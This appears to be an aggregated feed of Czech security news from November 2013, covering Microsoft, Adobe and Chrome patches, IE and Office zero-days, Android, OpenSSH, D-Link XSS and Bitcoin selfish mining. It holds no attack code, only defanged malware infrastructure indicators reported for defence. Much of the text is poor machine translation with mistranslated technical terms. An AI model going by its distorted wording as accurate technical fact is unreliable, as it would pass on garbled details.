Zero-day chyba je opravena v MS13-090, Kumulativní aktualizace pro dezaktivačních bitů ActiveX. Aktivně využívány chybu, která existuje v InformationCardSigninHelper třídy ovládacího prvku ActiveX by mohla umožnit útočníkovi spustit vzdálené spuštění kódu, pokud uživatel zobrazí speciálně vytvořenou webovou stránku v aplikaci Internet Explorer. Jako vždy, uživatelé s méně uživatelsky práv byli vystaveni menšímu riziku než ty administrátorskými právy.

Společnost Microsoft není záplatování druhé zero-day ve svém apartmá produktu Office Zatím ne, ale oni si vybudovali obejití něj. Známý jako TIFF zero-day, výzkumníci z SpiderLabs napsal na svém blogu , že Microsoft fixit nástroj by měl zmírnit problém, dokud záplat Microsoft to s tím, co bude pravděpodobně out-of-band náplast dříve, než příští měsíc vydání Patch úterý.

Ross Barrett, senior manažer inženýrství bezpečnosti na Rapid7, je uvedeno v e-mailové konverzace s Threatpost, že Microsoft neschopnost opravit chybu TIFF je frustrující, ale že jsou vidět jen velmi omezenou, cílené zneužití této chyby zabezpečení - pouze v určité oblasti - a vyžadují interakci s uživatelem využít. On je, proto s tím, že by si s tím starosti příliš mnoho.

Kromě těchto, MS13-088, Microsoft kumulativní aktualizace pro aplikaci Internet Explorer, která se netýkají nulové dnů, je pravděpodobné, že další nejvyšší prioritou oprava pro operátory. To řeší 10 chyb oznámených soukromými osobami, nejzávažnější z nich by mohla umožnit vzdálené spuštění kódu znovu, pokud uživatel zobrazí speciálně vytvořenou webovou stránku v aplikaci Internet Explorer, a tím poskytnutí útočník stejná uživatelská práva, jako aktuálního uživatele. Dopad by opět závisí na úrovni práv oběť na prohlížeči.

Další kriticky hodnocené chyba řeší problém v grafickém okenním rozhraní zařízení a mohla by také umožnit vzdálené spuštění kódu, pokud uživatel zobrazí nebo otevře speciálně vytvořený soubor Windows Write v programu WordPad. Opět platí, že uživatelé s méně právy byli vystaveni menšímu riziku.

Zbývajících, důležité hodnocené bulletinů MS13-091, MS13-095 přes, vyřešit sedm veřejně i soukromě hlášené chyby: vzdálené spuštění kódu v sadě Office, zvýšení výsad chyby v Hyper-V, informace zveřejňované ve funkci Windows vedlejší řidiče a Outlook a odmítnutí služby problém v systému Windows digitálních podpisů.

Tyler Reguly, technický ředitel bezpečnostního výzkumu a vývoje v Tripwire, řekl Threatpost, že nejzajímavější důležité hodnocené chyby je pravděpodobné, Outlook chybu, která by mohla umožnit port skenování a Hyper-V zranitelnosti, protože by to mohlo umožnit hostující OS do kódu hostovaného OS provedení a X.509 vydání v Schannel.dll která by mohla umožnit odmítnutí služby.

"Celkově, i když je jen střední Patch Tuesday, věnovat zvláštní pozornost dvěma 0-dnů a aktualizace aplikace Internet Explorer," napsal Wolfgang Kandek, CTO IT Qualys bezpečnostní firmy, ve své analýze patch verze. "Prohlížeče nadále oblíbeným cílem útočníků, a Internet Explorer s jeho vedoucí podíl na trhu, je jedním z nejviditelnějších a pravděpodobně cílů."

Můžete si přečíst Microsoftu plné bulletin upozorňováni zde .


Dalším Android "master key" chyba odhalila

13.11.2013 Mobil | Bezpečnost | Zranitelnosti

Existence jiného "master klíč" chybu, která může být použita, aby se zasadila malware na uživatele Android zveřejněn Jay Freeman (aka Saurik), technologie konzultant a bezpečnostní výzkumník, který objevil chybu ve stejnou dobu jako předchozí dva byly našel a zveřejněny v červenci. Freeman nešel veřejnost s jeho vědomím té doby, a místo toho oznámila společnost Google vady, aby mohla být stanovena v příchozím aktualizaci operačního systému. Ale teď, když je aktualizace, on sdílel chyba podrobnosti na blogu . Stručně řečeno, chyba je podobná druhé nalezeného a umožňuje malware trhovců vyměnit legitimní, ověřené aplikace jedním, který má škodlivý software přidal na to vše bez zařízení špinění lest a zastavit. Nebudu jít hluboko do technických detailů, jako Freeman příspěvek vysvětluje dokonale problém, zahrnuje PoC o exploit pro ni, a vysvětluje, jak může být oprava chyby . Případně Sophos Paul Ducklin to i rána do zaměstnání vysvětlujícím brouka složitosti. Uživatelé, kteří své aktualizované Android instalaci na nejnovější (4,4 - KitKat) verze jsou jediní, jejichž zařízení v současné době nemůže být napaden škodlivým aplikacím kteří nevyužijí tento nedostatek. Vzhledem k tomu, KitKat vyšlo o něco více než před týdnem, Android a aktualizace jsou obvykle pomalu dosahují skutečné zařízení, jen Google Nexus majitelé jsou tak daleko, trezor. Google si klade za cíl přinést většinu uživatelů k tomuto nejnovější verzi co nejdříve, ale realistická očekávání a oznámila termíny poukázat především na aktualizace v roce 2014.


IE zero-day zranitelnost Využití Msvcrt.dll

12.11.2013 Zranitelnosti

FireEye Labs objevil exploit ", která využívá nový informační úniku zranitelnost IE a out-of-bounds memory access zranitelnosti k dosažení spuštění kódu." [1] Na základě jejich analýzy, se týká IE 7, 8, 9 a 10.

Podle společnosti Microsoft, lze tuto chybu zabezpečení lze zmírnit Emet. [ 2 ] [ 3 ] Další informace o FireEye Labs funkce k dispozici zde .

Aktualizace : FireEye Labs poskytla doplňující informace o nedávno objevené IE zero-day exploit, který je v současné době ve volné přírodě a byl jmenován Trojan.APT.9002 (aka Hydraq / McRAT varianta). Oni vydali další informace o Trojan, který běží jen v paměti a nechat jen velmi málo artefaktů, které mohou pomoci identifikovat nakažené klienty. Další informace o Trojan lze nalézt zde , který také obsahuje seznam domén, MD5 hashi a User-Agent informací.

Update 2 : Microsoft vydává zítra opravu této chyby (CVE-2013 - 3918), které ovlivňují Explorer ActiveX Control "Věstník 3" MS13-090 uvedených v listopadu Microsoft Patch Preview úterý .

[1] http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html
[2] https://isc.sans .edu / forums / Deník / EMET 40 + je + + nyní k dispozici + pro + download/16019
[3] http://www.microsoft.com/en-us/download/details.aspx?id=39273
[4 ]


Útok na novou zranitelnost v IE probíhá z RAM

12.11.2013 Zranitelnosti | Hrozby
Kyberzločinci využívají ke svým útokům nově objevenou zranitelnost v prohlížeči Internet Explorer, na niž zatím neexistuje žádná oprava. Malware je uložen jen v RAM, po restartu počítače tedy zmizí.

Nový balík aktualizací, který Microsoft i tento týden, stejně jako každé druhé úterý v měsíci v rámci tzv. Patch Tuesday zpřístupnil uživatelům svých produktů, přináší hned několik zajímavostí. Osm záplat opravuje kritické chyby ve Windows a všech verzích webového prohlížeče Internet Explorer od IE6 až po IE11. Chyby v kancelářském balíku Office, Windows a platformě Lync, jež Microsoft zveřejnil minulý týden, opraveny bohužel nebudou – zatím však stále není jasné, zda budou opraveny nejnovější chyby v Internet Expoloreru, o nichž minulý týden přinesla informace společnost FireEye. Podle této bezpečnostní firmy jsou útoky s využitím nově objevených slabin IE prováděny z amerických webových stránek pomocí pokročilé techniky, jež vkládá škodlivý kód přímo do paměti a ohrožuje tak uživatele IE7, 8, 9 a 10 v operačních systémech Windows XP a Windows 7.

Podle FireEye byly útoky prováděny z webových stránek hostovaných ve Spojených státech a zaměřovaly se na lidi pracující v tamním zbrojním průmyslu. „Útočníci vložili zneužití nové chyby do velmi důležité webové stránky, o níž se ví, že ji navštěvují lidé zajímající se o národní a mezinárodní bezpečnostní politiku,“ napsali v neděli Ned Moran, Sai Omkar Vashisht, Mike Scott a Thoufique Haw z FireEye. Stránku však ve svém příspěvku nejmenovali. Podle nich jsou zločinci, kteří stojí za tímto novým útokem, zodpovědní také za průnik do systémů bezpečnostní společnosti Bit9, jež se odehrál dříve v tomto roce, a s největší pravděpodobností také podnikli za pomocí nové chyby v IE nedávné útoky na japonské cíle.

Kyberzločinci podle všeho využívají nejmodernější metody a techniky obdobné těm, jež podle společnosti Mandiant používala čínská hackerská skupina známá jako AP-1, která se zaměřuje zejména na americké cíle. Útoky zločinců běžně probíhají tak, že jsou jejich škodlivé kódy nainstalovány do počítače a spouští se stále znovu (dokud je někdo neodstraní) i po restartu zařízení. Ne tak nový červ zneužívající IE, jehož FireEye pojmenovalo jako Trojan.APT.9002. „Útočníci nahráli kód přímo do paměti bez zápisu na disk, což je technika, která se příliš nepoužívá. Bezpečnostní společnosti díky tomu budou mít problém za pomoci běžných forenzních metod vystopovat, odkud útočníci červy opravdu řídí.“

Útočníci se tak v tomto případě očividně rozhodli vyměnit možnost ovládání počítačů obětí po delší dobu za větší jistotu toho, že jejich identita zůstane skryta. Postup dále svědčí o tom, že jsou si jisti tím, že budou moci rychle získat kontrolu nad systémy obětí. Microsoft zatím na zjištění FireEye nereagoval a není tak jisté, kdy vydá pro svůj webový prohlížeč opravu.


Nový Microsoft 0-day zranitelnost pod útokem

12.11.2013 Zranitelnosti

Společnost Microsoft vydala informační zpravodaj zabezpečení KB2896666 , které informuje o zranitelnosti (CVE-2013 do 3906) ve formátu TIFF grafiky, který je vidět omezené útoky na Blízkém východě av jižní Asii. Tato chyba se vyskytuje v Microsoft Office 2003, 2007 a ​​2010 a některé starší operační systémy Windows, a v současné době pozorovat útoku je prostřednictvím dokumentů aplikace Microsoft Word. Společnost Microsoft poskytla Fix-It, který vypne TIFF vykreslování do postiženého grafickou knihovnu, která by neměla mít žádný vliv, pokud nejste v práci s soubory ve formátu TIFF na pravidelném základě. Uvedené softwarové balíky nejsou ohroženy za všech podmínek, takže Je důležité, aby jste se podívat na vaše instalované základny a své možné expozici pro příštích pár týdnů do prosince. Vzhledem k blízkosti datum příštího Patch Tuesday v listopadu, nevěříme, že se můžeme spolehnout na kousku dorazí včas, asi budeme muset počkat až do prosince, což váš plánování pro obejití ještě důležitější. Microsoft proaktivní zabezpečení toolkit EMET (Enhanced Experience Toolkit Zmírnění) zabraňuje útoku z provedení, stejně jako některé z Office 2010 bezpečnostní opatření, jako ochranného módu. Společnost Microsoft poskytla další informace v tomto blogu na svůj blog SRD. McAfee zveřejnila blogu poskytuje další podrobnosti o útoku prostřednictvím úřadu a jak se projevuje na napadení počítače. Autor: Wolfgang Kandek, CTO, Qualys.


Adobe, Google a další Patch Tuesday patche

12.11.2013 Zranitelnosti

Adobe

Adobe vydala dvě návěstí dnes:

(Oprava: APSB13-25 byl propuštěn minulý měsíc, a já ji odstranili z tohoto deníku Místo toho, APSB13-27 přidal níže).

APSB13-26: Aktualizace zabezpečení pro aplikaci Flash Player

Tato aktualizace se týká systému Windows, OS X a také Linux verzi Adobe Flash Player 11,9 (11,2 u Linxu), stejně jako prostředí Adobe AIR 3.9. Zranitelnost Flashplayer je přiřazena priorita "1" na Windows a OS X, který označuje exploit byl spatřen ve volné přírodě a Adobe doporučuje náplast "co nejdříve" (72 hod.).

Chyby jsou pokryty tímto patchem: CVE-2013-5329, CVE-2013-5330.

APSB13-27: Hotfix pro ColdFusion

Odkaz na tento informační zpravodaj je k dispozici na bezpečnostní Adobe bulletinu stránky a datum vydání je 12.listopadu (dnes), ale odkaz nefunguje právě teď.

Google

Google uvolnil novou verzi prohlížeče Chrome dnes: Chrome 31. Aktualizace obsahuje 25 bezpečnostní opravy . Není to zrovna bezpečnostní záplatu, ale stále zajímavé: Chrome 31 zvyšuje SSL šifry přidáním podpory pro AES-GCM šifer.


12 Selhávání pevné v prohlížeči Google Chrome
12.11.2013 Zranitelnosti

Google opravil 12 bezpečnostních chyb v prohlížeči Chrome , včetně šesti vysoce rizikových chyb. Nová verze prohlížeče obsahuje řadu oprav chyb nalezených pro externí badatelé stejně jako vlastní Google vnitřní bezpečnostní tým.

Dva z vážnějších chyb záplatované v Chrome jsou use-after-volné chyby v různých prvků prohlížeče, a tam jsou také dvě z hranic čte v prohlížeči. Ty jsou uvedeny jako vysoce rizikové nedostatky, stejně. Ale možná nejzajímavější Opravena chyba v nové verzi se středním rizikem zranitelnosti týkající se procesu vyjednávání TLS. Během tohoto procesu Chrome nedokázal dělat kontrolu některých osvědčení, s nimiž se setkávají.

Zde je kompletní seznam chyb opravených Chrome 31:

500 dolarů] [ 268565 ] Střední CVE-2013 - 6621: Použijte po volném vztahující se k prvkům řeči vstupů. Úvěry Khalil Zhani.

[$ 2000] [ 272786 ] High CVE-2013-6622: Použijte po volném souvisí s mediální prvky. Úvěr cloudfuzzer .

[500 dolarů] [ 282925 ] High CVE-2013-6623: Out of bounds číst v SVG. Úvěr miaubiz .

[$ 1000] [ 290566 ] High CVE-2013 - 6624: Použijte po volném souvisí s "ID" atribut řetězce. Kreditní Jon Butler .

[$ 2000] [ 295010 ] High CVE-2013 - 6625: Použijte po zpětném zdarma v rozsazích DOM. Úvěr cloudfuzzer .

[ 295695 ] Low CVE-2013 až 6626: Panel Adresa spoofing souvisí s intersticiální varování. Úvěry Chamal de Silva .

[4000 dolarů] [ 299892 ] High CVE-2013-6627: Out of bounds číst v parsování HTTP. Úvěr skylined .

[$ 1000] [ 306959 ] Střední CVE-2013 - 6628: Problém s certifikáty nebyly kontrolovány při sjednání TLS. Úvěry Antoine Delignat-Lavaud a Karthikeyan Bhargavan z Prosecco z INRIA Paříži .

[ 315823 ] Středně kritické CVE-2013 - 2931: Různé opravy z interních auditů, fuzzing a dalších iniciativ.
[ 258723 ] Střední CVE-2013 až 6629: Přečtěte si o neinicializované paměti v libjpeg a libjpeg-turbo. Kredit Michal Zalewski společnosti Google.
[ 299835 ] Střední CVE-2013 až 6630: Přečtěte si o neinicializované paměti libjpeg-turbo. Kredit Michal Zalewski společnosti Google.
[ 296804 ] High CVE-2013 - 6631: Použijte po zpětném zdarma libjingle. Kredit Patrik Hoglund projektu Chromium.
Jako součást svého programu bug odměnu, Google vyplaceno 11.000 amerických dolarů v roce prémií pro externí badatele.


Selfish Horníci by mohl zneužít P2P Povaha Bitcoin sítě

12.11.2013 Zranitelnosti | Bezpečnost

Výzkumní pracovníci a akademici jsou jen na začátku procesu se snaží posoudit hodnotu nedávno publikovaném na zranitelnosti v Bitcoin protokolu, některé z nich jsou tvrdí, že je menší bod, který má být v minul na všechny tam a zpět: To je problém s peer-to-peer nastavení sítě Bitcoin, které by mohly být využity za účelem zisku.

Hlavní tvrzení v Bitcoin Cornell výzkumných papíru je, že kartelová dohoda tzv. sobeckých horníků které představují nejméně jednu třetinu z celkové těžby populace by nakonec mohla vydělat víc než je jejich spravedlivý podíl příjmů Bitcoin. To by pak mohla vést k efektu sněhové koule, které by mohlo způsobit další horníci se k této kartelové dohodě v naději, že větší finanční odměny. Některé další vědci a akademici proti tomuto tvrzení a řekl, že to není tak, že lidé budou chovat v reálném světě, a to je těžké předvídat chování velkých skupin osob, zvláště když se jedná o peníze.

Ale pár výzkumníků, kteří analyzovaných noviny říkají, že tam je jiný problém, který je na papír Cornell, který je přehlížen, a sice, že útočník postavení v síti Bitcoin může dělat rozdíl v tom, jak útok funguje.

"Tady je ta věc: toto je poprvé, závažný problém s konsensuální mechanismus Bitcoin je využila peer-to-peer aspekt systému. To je problém pro naši schopnost uvažovat o Bitcoin. Kryptografie v Bitcoin je považován za solidní. Máme také nějaké schopnosti modelovat a psát rovnice o pobídky hornických a chování. Na základě toho jsme si mysleli, měli pádné důvody se domnívat, že "X% horníků může vydělat více než X% těžby příjmů", "Andrew Miller z University of Maryland a Arvind Narayanan Princeton univerzity napsal v nové analýze papíru .

"Ale pokud je síťové pozice může změnit na útočníkův vyhlídky, všechny tyto sázky jsou pryč. Nedostatky, které jsou závislé na útočníka vytváření "Sibyla" uzly v síti jsou velmi odlišné kategorie. Bitcoin je P2P síť je "otevřený pro veřejnost." Uzly mohou přicházet a odcházet, jak se jim zachce, a neočekává se, že poznat sebe. Spuštění uzlu Bitcoin znamená být ochoten akceptovat připojení od neznámých osob. To je problematické použít stávající teoretické modely pro vyhodnocování bezpečnosti Bitcoin. "

Miller a Narayanan říci, že když to bude pravděpodobně trvat nějaký čas, aby určili, zda jejich širší nároky na papíře Cornell jsou přesné, se domnívají, že základní předpoklad, že kartel menšina nezletilých mohli vydělat víc než jeho splatnosti příjmů je pravděpodobně platné.

"Předpoklad, že X% z hashpower nemohou vydělávat více než X% příjmů je téměř jistě není pravda, jednou X% vyšší než 33,3%," říkají vědci.


11. 2013 Microsoft Patch Tuesday

12.11.2013 Zranitelnosti

Přehled oprav 11. 2013 Microsoft a jejich stav.

# Ovlivněno Kontraindikace - KB Známé Využije Microsoft hodnocení (**) ISC hodnocení (*)
klienti servery
MS13-088 Kumulativní aktualizace zabezpečení pro aplikaci Internet Explorer
(Nahrazuje MS13-080 )
Internet

KB 2888505 Ne. Závažnost: Kritická
zneužitelnosti: 1,2,3 Kritický Důležitý
MS13-089 Umožňující vzdálené spuštění kódu ve Windows Graphics Device Interface
(Nahrazuje MS08-071 )
GDI + CVE-2013-3940
KB 2876331 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Důležitý
MS13-090 Umožňující vzdálené spuštění kódu v InformationCardSigninHelp ActiveX třídy
(Nahrazuje MS11-090 )
ActiveX (icardie.dll) CVE-2013-3.918
KB 2900986 Ano. Závažnost: Kritická
zneužitelnosti: 1 Patch NYNÍ! Důležitý
MS13-091 Umožňující vzdálené spuštění kódu v aplikaci Microsoft Office
(Nahrazuje bulletinu zabezpečení MS09-073 )
Microsoft Office (Word), CVE-2013-0082 CVE-2013 - 1324 CVE-2013 - 1325

KB 2885093 Ne. Závažnost: Důležité
zneužitelnosti: 1,3 Kritický Důležitý
MS13-092 Zvýšení Oprávnění zabezpečení v HyperV

HyperV Hosté (DoS pro hostitele) CVE-2013-3898
KB 2893986 Ne. Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS13-093 Informace Discolsure Chyba zabezpečení pomocnou funkci ovladače
(Nahrazuje MS12-009 )
Pomocné Funkce ovladače CVE-2013-3887
KB 2875783 Ne. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS13-094 Přístup k informacím Chyba zabezpečení v aplikaci Outlook
(Nahrazuje MS13-068 )
Outlook CVE-2013-3905
KB 2894514 Ne. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Méně důležité
MS13-095 Odmítnutí zabezpečení služby v digitální podpisy
(Nahrazuje Advisory 2661254 )
Digitální podpisy CVE-2013-3869
KB 2868626 Ne. Závažnost: Důležité
zneužitelnosti: 3 N / A Důležitý
Budeme aktualizovat problémy na této stránce asi týden nebo tak, jak se vyvíjejí. Vážíme aktualizace se sídlem v USA mohou zákazníci volat Microsoft zdarma opravy související podpory na čísle 1-866-PCSAFETY


OpenSSH zabezpečení

11.11.2013 Zranitelnosti

OpenSSH oznámil, že OpenSSH 6.2 a 6,3 jsou náchylné k ověřeným chyby spuštění kódu. Tato chyba ovlivňuje AES-GCM šifry. Jako rychlé řešení, můžete zakázat šifru (viz URL níže). Nebo můžete přejít na OpenSSH 6.4.

Uživatel může obejít omezení uvalená na uživatele účtu tím, že využívá chybu, ale uživatel potřebuje platná pověření využít vady.

[1] http://www.openssh.com/txt/gcmrekey.adv


IE Zero Day Zalévání díry útok Injects zlomyslným užitečným zatížením do paměti

11.11.2013 Zranitelnosti

Microsoft může být slibný relativně lehký Patch Tuesday uvolnění zítra, ale to neznamená, že její výzkumníci a vývojáři nebudou mít plné ruce práce. Nejen, že je zaneprázdněn Microsoft na opravu pro denní TIFF nulovou chybou hlášené před dvěma týdny, ale teď další dříve nehlášeného Internet Explorer chyba přistál na frontě.

Minulý pátek, vědci FireEye hlášeny nové zalévání děr útok proti jedné nejmenované americké společnosti nevládní organizace (NGO), hosting webových stránek vnitrostátní a mezinárodní politické vedení. FireEye ředitel hrozbách Darien Kindlund řekl, že je stále nejasné, jak útočníci ohrožena webové stránky. Kód zneužití je cílení na novou chybu v IE a napadení oběti pomocí drive-by download. Které využívají zaměřuje na informační úniku chybu, stejně jako paměť problém v IE, která umožňuje vzdálené spuštění kódu. Různé verze IE v systému Windows XP a Windows 7 mají vliv těchto útoků, které mohou být zmírněny tím, Enhanced Microsoft zmírňování Experience Toolkit (EMET), FireEye řekl.

Užitečné zatížení varianta McRAT Trojan-je vstřikováno přímo do paměti dělat detekce a soudní vyšetřování výzvou. FireEye také navázání spojení mezi těmito útoky, což je volání operace pomíjivé Hydra a starší DeputyDog útoku. DeputyDog, tak pojmenovaný po sérii nalezené v útoku kódu, se vynořil v září, a to pouze v době, kdy k řadě populárních japonských médií stránky. Malware byl zvyklý na špionáž , krádeže dokumentů a systémových dat z počítačů patřících do vlády, high-tech a výrobních firem v Japonsku. Kindlund řekl, že není jasné, jaké typy informací jsou odcizen v této současné kampani.

"Na základě naší viditelnosti do této hrozbě herce cílení se zdá, že hrozba herec má zájem průmyslu zvláštních zpravodajských služeb," řekl Kindlund.

Zatím FireEye řekl, že nový IE nula den je omezena na tomto jednom nejmenovaném webových stránek, které na rozdíl od jiných útoků zalévání děr, není špičatý s nebezpečným iframe nebo přesměrování napadených počítačů k útočníkovi kontrolované stránky, kde se stáhne další malware. Místo toho je shell kód přímo vstřikován do paměti, což je nový twist na tyto typy cílených útoků.

"Při použití paměti pouze metody, útok je mimořádně obtížné pro sítě obránce rozpoznat, když se snaží zkoumat a potvrzení, které koncové body jsou infikovány, za použití tradičních disků založených na forenzní metody," řekl Kindlund.

Škodlivý náklad prochází řadou kroků, než je spuštěn, včetně tří úrovní XOR dekódování před McRAT varianty, které jsou jako Trojan.APT.9002, přebírá infikovaný počítač. Tyto různé druhy kódování a dekódování větší složitost, která by mohla zmařit tradiční detekčních technologií, Kindlund a dodal, že malware je také poměrně lehký což znamená, že oběť by ničeho nevšiml děje na svém počítači.

Vstříknutím malware do paměti, ale nemá představovat určité omezení na útočníky. Nedostatek vytrvalosti, například, znamená, že útočník musí exfiltrate dat rychle, než je stroj restartován uživatelem, která by zničila Trojan z paměti.

"To znamená, že útočník musí rychle dostat do infikovaného koncového bodu a exfiltrate dat nebo přesunout příčně v ohrožení sítě dříve, než je koncový bod je restartován / Reset, "řekl Kindlund. "Pokud koncový bod restartuje nebo obnoví, pak malware úplně vymazán z koncového bodu a útočník bude muset znovu infikovat systém znovu."

"Případně může být použití tohoto netrvalými první fázi naznačují, že útočníci byli jisti, že jejich určené cíle by se jednoduše znovu ohrožena webové stránky a znovu napaden," řekl FireEye.

Výběrem tento způsob infekce, také omezuje množství automatizace podílí, Kindlund řekl.

"Tento druh činnosti vyžaduje man-moc, protože to se zdá, že útočník otočil exploit" zapnuto "a" vypnuto "v bude v průběhu této kampaně, aby se omezil počet infikovaných systémů, protože neměli správné zdroje měřítko a automatizovat tuto část útoku (to bylo všechno člověk řízený), "řekl Kindlund. "V důsledku otáčení exploit" zapnuto "a" vypnuto ", je také sítě Obráncovy práce těžší ověřit útok stále dochází v průběhu celé kampaně."

Tato verze Trojan.APT.9002 připojuje k velení a řízení serveru umístěného na 111 [.] 68. [.] 9. [.] 93 používá port 443, FireEye řekl, když to používá jiný protokol pro komunikaci, než předchozí verze. Vědci byli také schopni dát dohromady, z analýzy MD5 hash, že sdílí chování jiných McRAT variant, včetně domény dll [.] Freshdns [.] Org používá v DeputyDog kampaně.

"Věříme, že existuje souvislost mezi tímto kampaně a DeputyDog, ale nemáme dostatek důkazů potvrdit, že hrozba herec je ve stejné," řekl Kindlund. "Možné teorie v této době je to, že: 1). Existuje více, související hrozby herci opětovné stejnou infrastrukturu nebo 2) je to stejné ohrožení herec zodpovídal za kampaní"


OpenSSH Opravy poškození paměti chybná aktualizace

11.11.2013 Šifrování | Zranitelnosti

Vývojáři stojící za OpenSSH, koupelnou s připojením nástrojů, které pomáhá uživatelům šifrovat přenos na internetových zasedání uznala a záplatované přes víkend, že poškození paměti chyba zabezpečení existuje v některých verzích hlavního apartmá.

Pokud využívány, chyba zabezpečení by mohla, které lze nalézt v obou 6.2 a 6.3 sestavení OpenSSH, vedou k ověřeným chyby spuštění kódu, podle bezpečnostní poradenství na stránkách skupiny.

Hlavní problém pramení z post-autentizace sshd procesu a AES-GCM šifrovaných při výměně klíčů. SSHD nebyl inicializaci autentizační kód zprávy (MAC) a "vyčištění zpětné volání ještě byl vyvolán během re-klíčování provozu."

Hash založené na autentizační kódy zpráv (Macintoshe) dovolit sshd lepší bezpečnost díky ochraně integrity dat.

V tomto případě se však MAC se bude používat a adresa, která byla volána zpět se z předchozí dávky haldy obsahu.

Poradní nároky OpenBSD, který se rozvíjet sadu, opravil problém "pre-zatížení haldy s užitečným callback adresa" a prosazením adresa-prostorovém uspořádání randomizace (ASLR) k sshd a sdílených knihoven záleží na.

Vývojáři jsou povzbudivé uživatelům buď zakázat nepříjemné šifru, použít opravu - k dispozici na stránkách skupiny , nebo přejděte k OpenSSH 6.4 , který byl propuštěn v pátek.

Řešení potíží se zabezpečením, byla rychlá otočka pro OpenSSH. Markus Friedl, německý programátor a vývojář OpenSSH našel chybu a oznámil to jen den předtím, ve čtvrtek.


Hackeři objevili nové díry v Internet Exploreru a Office

11.11.2013 Zranitelnosti

Uživatelé starších softwarových produktů Microsoftu by se měli mít na pozoru. Byly totiž objeveny doposud nevyužité možnosti napadení, tzv. zero day exploit, a to u Internet Exploreru verzí 7, 8, 9 a 10 běžících pod Windows XP a Windows 7 a nezávisle na tom byla o pár dní dříve objevena nová díra také ve Windows Vista, Office 2003, 2010 a podnikových produktech Windows Server 2008 a Lync 2010 a 2013.

Oba případy jsou docela závažné a hrozí u nich zneužití záškodníky, Microsoft totiž ihned nevydal žádnou speciální záplatu skrze Windows Update a s nápravou vyčkává až na pravidelné servisní úterý.

Na nově objevenou bezpečnostní díru v Internet Exploreru upozornil tento víkend FireEye a v jádru se jedná o díry dvě. Jedna umožňuje vniknutí do paměti napadeného počítače s poměrně širokými možnostmi zneužití, druhá je o něco méně závažná a umožní čtení některých systémových informací.

Zatímco objevené chyby v Internet Exploreru jsou docela čerstvé, na ty v Office už Microsoft zareagoval alespoň vydáním manuální opravy. Zranitelnost spočívá ve speciálně upravených souborech TIFF, tedy souborech tvářících se navenek jako obrázky. O to nebezpečnější je jí výskyt v softwaru hojně využívaném v podnicích, kde jsou soubory TIFF běžnou součástí dokumentace. Po otevření napadeného souboru může útočník získat dálkový přístup k počítači se stejnými uživatelskými právy, jako má aktuální uživatelský účet.


D-Link Router ohrožená Cross-Site Scripting
11.11.2013 Hacking | Zranitelnosti

D-Link DSL-2760N (2760U-BN) routery údajně obsahují řadu uložených a reflexní cross-site scripting (XSS zranitelnosti).

Výzkumník Liad Mizrachi řekl, že kontaktoval D-Link zveřejnit podrobnosti o chybách, které jim ze šesti různých příležitostech - dvakrát v srpnu, dvakrát v září a poté v říjnu - ale to, že prodejce nereagoval na žádné z odhalení. Threatpost natáhl D-Link k připomínkám, ale neodpověděl na žádost před zveřejněním.

Rozmanité chyby jsou přítomny v různých částech routeru Web uživatelského rozhraní.

Podle umístění na Plný seznam zpřístupnění Poštovní , se 2760N routeru XSS chyby existují v nastavení NTS, rodičovskou kontrolu, filtrování URL adres, NAT spouštěč portu, IP filtrování, rozhraní seskupení, jednoduché síťové řídící protokol, vstupní filtr IP policy routing, tiskový server, SAMBA konfigurace a Wi-Fi SSID webové rozhraní, resp.

Tyto chyby postupujte závažnější zranitelnost backdoor, který se objevil minulý měsíc a mohl dát útočník možnost přístupu k postiženým směrovače a provádět žádnou akci mu zlíbilo. D-Link je údajně v procesu záplatování této chybě.


IE zero-day zranitelnost Využití Msvcrt.dll

9.11.2013 Zranitelnosti

FireEye Labs objevil exploit ", která využívá nový informační úniku zranitelnost IE a out-of-bounds memory access zranitelnosti k dosažení spuštění kódu." [1] Na základě jejich analýzy, se týká IE 7, 8, 9 a 10.

Podle společnosti Microsoft, lze tuto chybu zabezpečení lze zmírnit Emet. [ 2 ] [ 3 ] Další informace o FireEye Labs funkce k dispozici zde .

[1] http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html
[2] https://isc.sans .edu / forums / Deník / EMET 40 + je + + nyní k dispozici + pro + download/16019
[3] http://www.microsoft.com/en-us/download/details.aspx?id=39273


Firmy nabízí společné odměny za hledání chyb

8.11.2013 Zranitelnosti | Zabezpečení
Společnosti Microsoft a Facebook se rozhodly společně sponzorovat nový program, který bude vývojářům, expertům, ale i běžným uživatelům vyplácet odměnu za chyby nalezené ve známých programech.

Členy komise, jež bude posuzovat jednotlivé návrhy, budou lidé z Facebooku, Googlu, Microsoftu a několika dalších společností, kteří se již obdobných programů v minulosti účastnili. „Náš cíl je jednoduchý – chceme, aby internet byl lepším místem pro všechny uživatele,“ stojí v oficiálním prohlášení na hackerone.com, což je webová stránka, jež nový program hostuje. V rámci akce budou odměňovány chyby a zranitelnosti nalezené ve vývojářských jazycích Python, Ruby, PHP a Perl; vývojářských nástrojích a frameworcích Django, Ruby on Rails a Phabricator, webových serverech Apache a Nginx a sandboxu Google Chrome, Internet Exploreru, Adobe Readeru a Flash Playeru.

Odměněno bude také objevení bezpečnostní chyby, která postihuje jiný software, jenž je na trhu uživateli hojně využíván. Mezi příklady bezpečnostních rizik vývojáři na hackerone.com uvedli například útok BEAST proti SSL a DNS cache, který v roce 2008 objevil Dan Kaminsky. Odměny budou závislé na závažnosti nahlášené chyby a softwaru, který postihuje. Například odměna za zranitelnosti v Phabricatoru bude začínat na 300 dolarech a může dosáhnout až desetinásobku této částky, za zranitelnosti objevené v sandboxu internetových protokolů lze pak získat minimálně pět tisíc dolarů. Konkrétní sumu vždy přisoudí komise. Pokud by se vývojář rozhodl spolu s popisem chyby zaslat i opravu, bude odměna dvojnásobná. Nový program není adresován pouze bezpečnostním expertům, ale komukoli, kdo objeví chybu/zranitelnost v softwaru. V současné době vyplácení odměn sponzoruje pouze Microsoft a Facebook.

Podobnou iniciativu minulý měsíc spustil také Google, který se rozhodl platit za zranitelnosti nalezené ve známých open-sourcových aplikacích a softwarových knihovnách jako OpenSSL, OpenSSH, BIND, libjpeg, libpng a dalších. To je asi také důvodem, proč Google odměnu v rámci programu HackerOne nesponzoruje, i když Chris Evans, člen Google Chrome Security Teamu, je součástí komise HackerOne.

